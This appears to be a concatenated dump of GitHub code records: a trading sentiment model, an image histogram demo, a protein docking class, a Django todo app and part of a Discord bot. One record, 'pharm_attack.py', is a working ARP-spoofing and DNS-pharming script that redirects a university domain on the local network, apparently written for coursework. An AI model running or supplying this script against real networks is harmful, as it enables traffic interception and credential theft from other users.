neu.append(SIA['neu'])\n pos.append(SIA['pos'])\n\n#Store the sentiment scores in the merge data set\nmerge['Compound'] = compound\nmerge['Negative'] = neg\nmerge['Neutral'] = neu\nmerge['Positive'] = pos\n\n#Create a list of columns to keep\nkeep_columns = ['Open','High', 'Low', 'Volume', 'Subjectivity', 'Polarity', 'Compound', 'Negative', 'Neutral', 'Positive', 'Label']\ndf = merge[keep_columns]\n\nprint(df.head)\n\n#Create the feature data set\nX = df\nX = np.array(X.drop(['Label'],1))\n\n#Create the data target data\nY = np.array(df['Label'])\n\n#Split the data into 80% training and 20% testing data sets\nx_train,x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n#Create and train the model\nmodel = LinearDiscriminantAnalysis().fit(x_train, y_train)\n\n#Show the models predictions\npredictions = model.predict(x_test)\nprint(predictions)\n\n#Show the model metrics\nprint(classification_report(y_test, predictions))\n", "repo_name": "CameronCroker/TradingAdvisor", "sub_path": "Sentiment_analysis.py", "file_name": "Sentiment_analysis.py", "file_ext": "py", "file_size_in_byte": 3537, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 48, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 53, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 57, "usage_type": "call"}, {"api_name": "vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 106, "usage_type": "call"}, {"api_name": "sklearn.discriminant_analysis.LinearDiscriminantAnalysis", "line_number": 109, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 116, "usage_type": "call"}]}
+{"seq_id": "28437758089", "text": "# import the necessary packages\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport argparse\nimport cv2\nfrom PIL import Image\n\n# load the image and show it\nimage3 = np.asarray(Image.open(\"sample4.jpg\").convert('RGBA').resize((32,32),Image.ANTIALIAS))\nimage1 = np.asarray(Image.open(\"1.png\").convert('RGBA').resize((32,32),Image.ANTIALIAS))\nimage2 = np.asarray(Image.open(\"4.png\").convert('RGBA').resize((32,32),Image.ANTIALIAS))\n# cv2.imshow(\"image\", image)\n\n# grab the image channels, initialize the tuple of colors,\n# the figure and the flattened feature vector\ni=1\nfor image in [image1,image2,image3]:\n\tchans = cv2.split(image)\n\tcolors = (\"r\", \"g\", \"b\")\n\tplt.figure()\n\tplt.title(\"'Flattened' Color Histogram\")\n\tplt.xlabel(\"Bins\")\n\tplt.ylabel(\"# of Pixels\")\n\tfeatures = []\n\n\t# loop over the image channels\n\tfor (chan, color) in zip(chans, colors):\n\t\t# create a histogram for the current channel and\n\t\t# concatenate the resulting histograms for each\n\t\t# channel\n\t\thist = cv2.calcHist([chan], [0], None, [8], [0, 256])\n\t\thist = hist / sum(hist)\n\n\t\tfeatures.extend(hist)\n\n\t\t# plot the histogram\n\t\tplt.plot(hist, color = color)\n\t\tplt.xlim([0, 8])\n\t\tplt.ylim([0,0.4])\n\n\tplt.savefig(\"Flat3DHist\"+str(i))\n\ti+=1\n", "repo_name": "tpsatish95/image-captioning", "sub_path": "other/Feature Extraction/Demo/3DHist/genHOG.py", "file_name": "genHOG.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.asarray", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 11, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "cv2.calcHist", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}]}
+{"seq_id": "31230220021", "text": "import threading\nfrom typeguard import typechecked\nfrom DockingPP.dockingHandler import DockingHandler\nfrom typing import Tuple, TypedDict, List, Optional, Dict\nfrom DockingPP.pose import Pose\nfrom DockingPP.frequencies import Frequencies\nimport logging\nimport ccmap\nimport pypstruct.coordinates as PDB\n\nPARSER_PDB = PDB.Parser()\n\nclass DockingHandlerZdock(DockingHandler):\n \"\"\"A class that handles docking results\n \"\"\"\n\n def __init__(self, grid_dimension: int, step: float, initial_euler: Tuple[float, float, float], baryRec: Tuple[float, float, float], baryLig: Tuple[float, float, float]):\n self.grid_dimension: int = grid_dimension\n \"\"\"size N of the NxNxN grid used in the docking\"\"\"\n self.step: float = step\n \"\"\"spacing between grid cells\"\"\"\n self.initial_euler: Tuple[float, float, float] = initial_euler\n \"\"\"initial rotation of the ligand in Euler angles\"\"\"\n self.baryRec: Tuple[float, float, float] = baryRec\n \"\"\"receptor initial translation to center\"\"\"\n self.baryLig: Tuple[float, float, float] = baryLig\n \"\"\"ligand initial translation to center\"\"\"\n self.ligand: 'pyproteinsExt.structure.coordinates.Structure' = None\n \"\"\"ligand pdb parsed by pyproteinsExt. Set with setLigand method.\"\"\"\n self.receptor: 'pyproteinsExt.structure.coordinates.Structure' = None\n \"\"\"receptor pdb parsed by pyproteinsExt. Set with setReceptor method\"\"\"\n self.poses: List[Pose] = []\n \"\"\"List of docking poses. Set with calls to addPose method.\"\"\"\n self.offsetRec: Tuple[float, float, float] = tuple(\n [-1 * bary for bary in self.baryRec])\n \"\"\"Corrected initial translation of receptor\"\"\"\n self.offsetLig: Tuple[float, float, float] = tuple(\n [-1 * bary for bary in self.baryLig])\n \"\"\"Corrected initial translation of ligand\"\"\"\n self._raw_contact_map: List[List[int]\n ] = None # Raw contact map from ccmap\n self.freq: Frequencies = None\n \"\"\"Object that stores frequencies computations. Set with computeFrequencies method.\"\"\"\n self._nb_rescored_poses: int = 0\n self._nb_cmap_poses: int = 0\n self.clusters: Dict[str, Dict[Pose, List[Pose]]] = {}\n \"\"\"Poses clusters. Dictionary with score as key and dictionnary as value with representative pose as key and other poses that belongs to cluster as value. Set with clusterPoses.\"\"\"\n\n def __str__(self):\n return f\"#DockingHandler object\\nGrid dimension : {self.grid_dimension}\\nStep : {self.step}\\nInitial euler vector : {self.initial_euler}\\nNumber of poses : {len(self.poses)}\\nLigand offset : {self.offsetLig}\\nReceptor offset : {self.offsetRec}\"\n\n def setLigand(self, ligand_pdb: str):\n \"\"\"Set ligand attribute of class with ligand pdb. \n\n Args:\n ligand_pdb (str): Path to ligand pdb\n \"\"\"\n logging.info(f\"== Set ligand ==\\nfile: {ligand_pdb}\")\n self.ligand = PARSER_PDB.load(file=ligand_pdb)\n\n def setReceptor(self, receptor_pdb: str):\n \"\"\"Set receptor attribute of class with receptor pdb. \n\n Args:\n receptor_pdb (str): Path to receptor pdb\n \"\"\"\n logging.info(f\"== Set receptor ==\\nfile: {receptor_pdb}\")\n self.receptor = PARSER_PDB.load(file=receptor_pdb)\n\n def addPose(self, pose_index: int, euler: Tuple[float, float, float], translation: Tuple[float, float, float]):\n \"\"\"Add pose from zdock line informations. Used in loader.loadZdock\n\n Args:\n pose_index (int): Index of the pose\n euler (Tuple[float, float, float]): Euler vector of the pose\n translation (Tuple[float, float, float]): Translation vector of the pose\n\n \"\"\"\n p = Pose(pose_index, euler, translation)\n self.poses.append(p)\n\n def computeContactMap(self, nb_threads: int, nb_poses: int, distance: float = 5):\n \"\"\"Function that compute contact map for given poses and distance. It uses ccmap module, decode and store its results. \n\n Args:\n nb_threads (int): Number of threads to compute contact map\n nb_poses (int): Number of poses to compute contact map\n distance (float, optional): Distance (in Angstrom) below which two residues are considered in contact. Defaults to 5.\n\n Raises:\n error.IncompatiblePoseNumber: Raise if you want to compute on more poses than loaded. \n \"\"\"\n if nb_poses > len(self.poses):\n raise error.IncompatiblePoseNumber(\n f\"You try to compute contact map on {nb_poses} and only {len(self.poses)} are loaded\")\n logging.info(\n f\"== Compute contact map ==\\nnumber of threads : {nb_threads}\\nnumber of poses : {nb_poses}\\ndistance : {distance}\")\n\n if not self.ligand:\n raise error.PdbNotSet(\"Ligand is not set. Call setLigand first.\")\n\n if not self.receptor:\n raise error.PdbNotSet(\n \"Receptor is not set. Call setReceptor first.\")\n\n self._nb_cmap_poses = nb_poses\n output = [None for i in range(nb_threads)]\n threadPool = []\n for i, poses in self._split_poses(nb_poses, nb_threads):\n threadPool.append(threading.Thread(target=self._ccmap_thread, args=(\n [p.euler for p in poses], [p.translation for p in poses], i, output, distance)))\n\n for th in threadPool:\n th.start()\n\n for th in threadPool:\n th.join()\n\n ccmap_result = [pose for thread in output for pose in thread]\n self._decodeContactMap(ccmap_result)\n\n def _ccmap_thread(self, eulers: List[Tuple[float, float, float]], translations: List[Tuple[float, float, float]], thread_number: int, output: List[Optional[int]], distance: float):\n \"\"\"Prepare a thread for ccmap execution.\n\n Args:\n eulers (List[Tuple[float, float, float]]): List of euler vectors for the pose computed by the thread\n translations (List[Tuple[float, float, float]]): List of translation vectors for the pose computed by the thread\n thread_number (int): Number of the tread\n output (List[Optional[int]]): Where the output will be stored\n distance (float): Distance for contact computation \n \"\"\"\n output[thread_number] = ccmap.lzmap(self.receptor.atomDictorize, self.ligand.atomDictorize, eulers,\n translations, d=distance, encode=True, offsetRec=self.offsetRec, offsetLig=self.offsetLig)\n return\n \n def _decodeContactMap(self, ccmap_result : List[List[int]]):\n \"\"\"Decode ccmap int results. For each pose, decode int into index pairs, and add contact and residues to Pose object. \n\n Args:\n ccmap_result (List[List[int]]): ccmap results, list of list of int. Each element of the list is the list of encoded contact pairs for one pose.\n \"\"\"\n self._raw_contact_map = []\n ligand_residue_number = self.ligand.residueNumber\n for pose_index in range(len(ccmap_result)): \n pose_contact = ccmap_result[pose_index]\n pose_object = self.poses[pose_index]\n pose_object.contact_computed = True\n residues_index=[(int(i/ligand_residue_number), i % ligand_residue_number) for i in pose_contact]\n for index in residues_index:\n pose_object.addContact(index)\n pose_object.addResidueAtInferface(\"ligand\", index[1])\n pose_object.addResidueAtInferface(\"receptor\", index[0])\n self._raw_contact_map.append(residues_index)\n \n def getRankedClusters(self, ranked_by: str) -> List[Tuple[int, List['DockingPP.pose.Pose']]]:\n \"\"\"Get clusters in decreasing order of given score\n\n Args:\n ranked_by (str): Score to rank by\n\n Raises:\n error.ClustersNotComputed: Raise if clusters are not computed\n error.InvalidScore : Raise if score is not computed or invalid\n\n Returns:\n List[Tuple[int, List[DockingPP.pose.Pose]]]: List of tuples where first element is cluster number and second is the list of poses inside the cluster.\n\n Examples:\n For 1BJ1, get CONSRANK_U clusters and display pose index.\n\n >>> clusters = DH.getRankedClusters(\"CONSRANK_U\")\n >>> for clust in clusters[:2]:\n >>> print(\"cluster :\", clust[0], \"poses :\", [p.index for p in clust[1]])\n cluster : 0 poses : [16, 1, 5, ...]\n cluster : 1 poses : [74, 452, 1212, ...]\n\n \"\"\"\n if not self.clusters:\n raise error.ClustersNotComputed(\n \"Clusters have not been computed. Call clusterPoses first\")\n\n if not ranked_by in self.clusters:\n raise error.InvalidScore(\n f\"{ranked_by} cluster is invalid or not computed\")\n\n nb_cluster = 0\n list_clusters = []\n for rep_pose in self.clusters[ranked_by]:\n list_clusters.append(\n (nb_cluster, [rep_pose] + self.clusters[ranked_by][rep_pose]))\n nb_cluster += 1\n\n return list_clusters\n", "repo_name": "MMSB-MOBI/DockingPP", "sub_path": "src/DockingPP/dockingHandlerZdock.py", "file_name": "dockingHandlerZdock.py", "file_ext": "py", "file_size_in_byte": 9206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pypstruct.coordinates.Parser", "line_number": 11, "usage_type": "call"}, {"api_name": "pypstruct.coordinates", "line_number": 11, "usage_type": "name"}, {"api_name": "DockingPP.dockingHandler.DockingHandler", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "DockingPP.pose.Pose", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 40, "usage_type": "name"}, {"api_name": "DockingPP.frequencies.Frequencies", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 46, "usage_type": "name"}, {"api_name": "DockingPP.pose.Pose", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 46, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 67, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 70, "usage_type": "name"}, {"api_name": "DockingPP.pose.Pose", "line_number": 79, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 96, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 110, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 122, "usage_type": "name"}, {"api_name": "ccmap.lzmap", "line_number": 132, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 155, "usage_type": "name"}]}
+{"seq_id": "12959979613", "text": "#!/usr/bin/env python3\n\nimport os\nimport time\nimport threading\nimport netifaces as ni\nimport scapy.all as scapy\n\nfrom math import log2\nfrom netfilterqueue import NetfilterQueue\n\n\ndef start_command():\n\tqueue_num = 0\n\tos.system('iptables --flush')\n\tos.system('echo 1 > /proc/sys/net/ipv4/ip_forward') \t# enable IP fowarding\n\tos.system('iptables -I FORWARD -j NFQUEUE --queue-num %d' % queue_num)\n\n\ndef end_command():\n\tos.system('echo 0 > /proc/sys/net/ipv4/ip_forward') \t# disable IP fowarding\n\tos.system('iptables --flush')\n\n\ndef get_device_info():\n\tattacker_ip = scapy.get_if_addr(scapy.conf.iface) \t\t# default interface\n\tattacker_mac = scapy.get_if_hwaddr(scapy.conf.iface) \t# default interface \n\t\n\tgateway = ni.gateways()['default'][ni.AF_INET]\n\taf_inet = ni.ifaddresses(gateway[1])[ni.AF_INET][0]\n\tcidr = 32 - sum([int(log2(256 - int(num))) for num in af_inet['netmask'].split('.')])\n\n\tgateway_ip = gateway[0]\n\ttarget_domain = gateway_ip + '/' + str(cidr)\n\tanswered, unanswered = scapy.arping(target_domain, verbose=False)\n \n\tvictims = list()\n\tprint('Available devices')\n\tprint('+-----------------+-------------------+')\n\tprint('| IP Address | MAC Address |')\n\tprint('+-----------------+-------------------+')\n\tfor sent, recv in answered:\n\t\tif (recv.psrc != gateway_ip):\n\t\t\tvictims.append({'ip': recv.psrc, 'mac': recv.hwsrc})\n\t\t\tprint(f'| {recv.psrc:<15s} | {recv.hwsrc:<17s} |')\n\t\telse:\n\t\t\tgateway_mac = recv.hwsrc\n\tprint('+-----------------+-------------------+')\n\n\treturn attacker_ip, attacker_mac, gateway_ip, gateway_mac, victims\n\n\ndef send_arp_spoof_packet(send_ip, recv_ip, recv_mac):\n\tpacket = scapy.ARP(op=\"is-at\", psrc=send_ip, pdst=recv_ip, hwdst=recv_mac) # op=2 --> is-at\n\tscapy.send(packet, verbose=False)\n\n\ndef restore_arp_spoof_packet(src_ip, src_mac, recv_ip, recv_mac):\n\tpacket = scapy.ARP(op=\"is-at\", psrc=src_ip, hwsrc=src_mac, pdst=recv_ip, hwdst=recv_mac)\n\tscapy.send(packet, verbose=False)\n\n\ndef arp_spoofing(gateway_ip, gateway_mac, victims, terminate):\n\twhile True:\n\t\tfor victim in victims:\n\t\t\t# send arp packet to victim\n\t\t\tsend_arp_spoof_packet(\n\t\t\t\tsend_ip=gateway_ip, recv_ip=victim['ip'], recv_mac=victim['mac']\n\t\t\t)\n\t\t\t# send arp packet to gateway\n\t\t\tsend_arp_spoof_packet(\n\t\t\t\tsend_ip=victim['ip'], recv_ip=gateway_ip, recv_mac=gateway_mac\n\t\t\t)\n\t\ttime.sleep(1) \n\t\tif terminate.is_set():\n\t\t\tfor victim in victims:\n\t\t\t\trestore_arp_spoof_packet(\n\t\t\t\t\tsrc_ip=gateway_ip, src_mac=gateway_mac, \n\t\t\t\t\trecv_ip=victim['ip'], recv_mac=victim['mac']\n\t\t\t\t)\n\t\t\t\trestore_arp_spoof_packet(\n\t\t\t\t\tsrc_ip=victim['ip'], src_mac=victim['mac'], \n\t\t\t\t\trecv_ip=gateway_ip, recv_mac=gateway_mac\n\t\t\t\t) \n\t\t\tbreak\n\n\ndef modify_packet(pkt):\n\tdomain_name = b'www.nycu.edu.tw'\n\tredirect_ip = '140.113.207.241'\n\n\tscapy_pkt = scapy.IP(pkt.get_payload()) \t# convert the packet into scapy packet\n\t\n\tif scapy_pkt.haslayer(scapy.DNSRR): \t\t# DNS Resource Record\n\t\tqname = scapy_pkt[scapy.DNSQR].qname \t# extract the domain name\n\n\t\tif domain_name in qname:\n\t\t\tfake_answer\t= scapy.DNSRR(rrname=qname, rdata=redirect_ip)\n\t\t\tscapy_pkt[scapy.DNS].an = fake_answer\n\t\t\tscapy_pkt[scapy.DNS].ancount = 1\n\n\t\t\tdel scapy_pkt[scapy.IP].len\n\t\t\tdel scapy_pkt[scapy.IP].chksum\n\t\t\tdel scapy_pkt[scapy.UDP].len\n\t\t\tdel scapy_pkt[scapy.UDP].chksum\n\n\t\t\tpkt.set_payload(bytes(scapy_pkt))\n\n\tpkt.accept()\n\n\ndef pharming_attack(thread, terminate):\n\tprint(\"\\nStart pharming ...\")\n\tnfqueue = NetfilterQueue()\n\ttry:\n\t\tnfqueue.bind(0, modify_packet)\n\t\tnfqueue.run()\n\texcept KeyboardInterrupt:\n\t\tprint(\"\\nDetected CTRL + C pressed and Exiting ...\")\n\t\tterminate.set()\n\t\tthread.join()\n\t\tnfqueue.unbind()\n\t\tend_command()\n\t\tprint(\"Stop pharming\")\n\n\ndef main():\n\tif os.geteuid() != 0:\n\t\texit(f'{__file__}: Permission denied')\n\t\n\tstart_command()\n\tattacker_ip, attacker_mac, gateway_ip, gateway_mac, victims = get_device_info()\n\n\tterminate = threading.Event()\n\tarp_thread = threading.Thread(\n\t\ttarget=arp_spoofing, \n\t\targs=(gateway_ip, gateway_mac, victims, terminate), \n\t\tdaemon=True\n\t)\n\tarp_thread.start()\n\tpharming_attack(arp_thread, terminate)\n\n\nif __name__ == '__main__':\n\tmain()", "repo_name": "DW1209/MITM-and-Pharming-Attacks-in-Wi-Fi-Networks", "sub_path": "pharm_attack.py", "file_name": "pharm_attack.py", "file_ext": "py", "file_size_in_byte": 4111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.system", "line_number": 15, "usage_type": "call"}, {"api_name": "os.system", "line_number": 16, "usage_type": "call"}, {"api_name": "os.system", "line_number": 17, "usage_type": "call"}, {"api_name": "os.system", "line_number": 21, "usage_type": "call"}, {"api_name": "os.system", "line_number": 22, "usage_type": "call"}, {"api_name": "scapy.all.get_if_addr", "line_number": 26, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 26, "usage_type": "name"}, {"api_name": "scapy.all.conf", "line_number": 26, "usage_type": "attribute"}, {"api_name": "scapy.all.get_if_hwaddr", "line_number": 27, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 27, "usage_type": "name"}, {"api_name": "scapy.all.conf", "line_number": 27, "usage_type": "attribute"}, {"api_name": "netifaces.gateways", "line_number": 29, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 29, "usage_type": "attribute"}, {"api_name": "netifaces.ifaddresses", "line_number": 30, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 30, "usage_type": "attribute"}, {"api_name": "math.log2", "line_number": 31, "usage_type": "call"}, {"api_name": "scapy.all.arping", "line_number": 35, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 35, "usage_type": "name"}, {"api_name": "scapy.all.ARP", "line_number": 54, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 54, "usage_type": "name"}, {"api_name": "scapy.all.send", "line_number": 55, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 55, "usage_type": "name"}, {"api_name": "scapy.all.ARP", "line_number": 59, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 59, "usage_type": "name"}, {"api_name": "scapy.all.send", "line_number": 60, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 60, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "scapy.all.IP", "line_number": 92, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 92, "usage_type": "name"}, {"api_name": "scapy.all.DNSRR", "line_number": 94, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 94, "usage_type": "name"}, {"api_name": "scapy.all.DNSQR", "line_number": 95, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 95, "usage_type": "name"}, {"api_name": "scapy.all.DNSRR", "line_number": 98, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 98, "usage_type": "name"}, {"api_name": "scapy.all.DNS", "line_number": 99, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 99, "usage_type": "name"}, {"api_name": "scapy.all.DNS", "line_number": 100, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 100, "usage_type": "name"}, {"api_name": "scapy.all.IP", "line_number": 102, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 102, "usage_type": "name"}, {"api_name": "scapy.all.IP", "line_number": 103, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 103, "usage_type": "name"}, {"api_name": "scapy.all.UDP", "line_number": 104, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 104, "usage_type": "name"}, {"api_name": "scapy.all.UDP", "line_number": 105, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 105, "usage_type": "name"}, {"api_name": "netfilterqueue.NetfilterQueue", "line_number": 114, "usage_type": "call"}, {"api_name": "os.geteuid", "line_number": 128, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 134, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 135, "usage_type": "call"}]}
+{"seq_id": "71564070169", "text": "from django.shortcuts import render, redirect\nfrom .forms import listForm\n\nfrom .models import List\n\n\n# Create your views here.\ndef search_tasks(request):\n if request.method == 'GET':\n user_search = request.GET.get('search') or ''\n returned_item = List.objects.filter(task__icontains=user_search)\n context = {\n 'tasks': returned_item\n }\n return render(request, 'index.html', context)\n\n\ndef task_view(request):\n tasks = List.objects.all()\n context = {'tasks': tasks}\n return render(request, 'index.html', context)\n\n\ndef add_new_tasks(request):\n if request.method == 'POST':\n form = listForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('task_view')\n else:\n form = listForm()\n return render(request, 'add.html', {'form': form})\n\n\ndef update_list(request, id):\n task = List.objects.get(id=id)\n form = listForm(request.POST or None, instance=task)\n if form.is_valid():\n form.save()\n return redirect('task_view')\n return render(request, 'update.html', {'form': form})\n\n\ndef delete_item(request, id):\n task = List.objects.get(id=id)\n task.delete()\n return redirect('task_view')\n", "repo_name": "jaden81699/todoList", "sub_path": "todoList/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "models.List.objects.filter", "line_number": 11, "usage_type": "call"}, {"api_name": "models.List.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.List", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 15, "usage_type": "call"}, {"api_name": "models.List.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "models.List.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.List", "line_number": 19, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "forms.listForm", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "forms.listForm", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "models.List.objects.get", "line_number": 36, "usage_type": "call"}, {"api_name": "models.List.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.List", "line_number": 36, "usage_type": "name"}, {"api_name": "forms.listForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 40, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "models.List.objects.get", "line_number": 45, "usage_type": "call"}, {"api_name": "models.List.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.List", "line_number": 45, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "27126022627", "text": "# GENERAL BOT FUNCTIONS\n\n# bot.py\nimport googletrans\nimport pytube\n\nimport BeatRequests\nimport Bugs\nfrom Bugs import BugHandler\nfrom Beans import BeanHandler\nfrom Movies import MovieHandler\nimport Music\nimport glob\nimport math\nimport os\nimport random\nimport time\nimport asyncio\nimport datetime\nimport math\nimport feedparser\nfrom bs4 import BeautifulSoup\n\nimport discord\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nfrom googletrans import Translator\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\nADMINID = int(os.getenv('DISCORD_ADMINID'))\n\nidentifier = os.getenv('IDENTIFIER_STR')\n\nintents = discord.Intents().default()\nintents.members = True\n\nbot = commands.Bot(command_prefix='+', intents=intents)\nbot.remove_command('help')\n\nbeanHandler = BeanHandler()\nbugHandler = BugHandler()\nmovieHandler = MovieHandler(0)\nreqManager = BeatRequests.BSReqHandler()\n\nmusicDict = dict()\n# service_urls=['translate.googleapis.com']\ntranslator = Translator()\n\n\n# START OF BOT COMMANDS\n\n@bot.event\nasync def on_ready():\n currentSongIndex = 0\n print(\n f'{bot.user} is Online!'\n )\n\n\n# HELP CMDS ----------------------------------------------------------------------------- ###\n\n@bot.command(name=\"help\")\nasync def help(ctx):\n print(str(ctx.author.id))\n outStr = \"COMMANDS:\"\n outStr += \"\\n+musicHelp: Explains how to request, skip, and manage songs\"\n outStr += \"\\n+movieHelp: Explains how to add, remove, and view requested movies\"\n outStr += \"\\n+beanHelp: Explains the Beanking System(tm)\"\n outStr += \"\\n+sCasm(commment): Makes a comment sarcastic\"\n outStr += \"\\n+myIQ: Accurate IQ reading\"\n outStr += \"\\n+pfpGrabMe: Grabs ya PFP son\"\n outStr += \"\\n+pfpGrab(Mention User): Grabs someones PFP son\"\n outStr += \"\\n+goodBot: He is a good bot after all asd\"\n await ctx.send(outStr)\n\n\n@bot.command()\nasync def beanHelp(ctx):\n outStr = \"BEAN COMMANDS:\"\n outStr += \"\\n+beanCounter: Shows your Beank 